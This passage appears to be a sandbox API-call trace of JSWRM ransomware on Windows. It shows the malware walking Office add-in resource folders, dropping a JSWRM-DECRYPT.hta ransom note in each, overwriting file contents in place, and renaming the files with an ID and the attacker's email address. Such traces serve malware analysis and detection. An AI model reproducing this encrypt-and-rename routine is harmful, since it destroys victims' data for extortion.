cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.320] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0127.320] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf048f354, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1042", cAlternateFileName="")) returned 1 [0127.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\jswrm-decrypt.hta")) returned 0xffffffff [0127.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.321] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.321] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.325] CloseHandle (hObject=0x338) returned 1 [0127.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\jswrm-decrypt.hta")) returned 0x20 [0127.325] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x428c86cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0127.326] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x428c86cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.326] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x428c86cd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x428c86cd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x428c86cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.326] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.390] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=69216) returned 1 [0127.390] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.390] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10e60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x10e60, lpOverlapped=0x0) returned 1 [0127.418] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.418] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10e60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x10e60, lpOverlapped=0x0) returned 1 [0127.418] CloseHandle (hObject=0x264) returned 1 [0127.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1042\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1042\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.427] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.427] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0127.427] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1043", cAlternateFileName="")) returned 1 [0127.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\jswrm-decrypt.hta")) returned 0xffffffff [0127.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.429] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.429] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.430] CloseHandle (hObject=0x338) returned 1 [0127.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\jswrm-decrypt.hta")) returned 0x20 [0127.431] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x429d376b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0127.431] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x429d376b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.431] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x429d376b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x429d376b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x429d376b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.431] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.432] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=72288) returned 1 [0127.432] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.432] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.438] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.438] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.439] CloseHandle (hObject=0x264) returned 1 [0127.439] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1043\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1043\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.440] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.440] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0127.440] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1044", cAlternateFileName="")) returned 1 [0127.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1044\\jswrm-decrypt.hta")) returned 0xffffffff [0127.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1044\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.442] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.442] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.443] CloseHandle (hObject=0x338) returned 1 [0127.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1044\\jswrm-decrypt.hta")) returned 0x20 [0127.443] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x429f99f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0127.443] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x429f99f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.443] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x429f99f8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x429f99f8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x429f99f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.445] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.445] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0127.621] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.621] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0127.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1044\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1044\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1044\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.629] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.629] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.631] CloseHandle (hObject=0x338) returned 1 [0127.631] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.631] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0127.638] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.638] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0127.639] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1045\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1045\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1045\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1045\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.642] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.643] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.644] CloseHandle (hObject=0x338) returned 1 [0127.644] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.644] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.651] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.651] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1046\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1046\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1046\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1046\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.712] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.713] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.715] CloseHandle (hObject=0x338) returned 1 [0127.715] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.715] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.721] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.722] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1048\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1048\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1048\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1048\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.725] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.725] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, 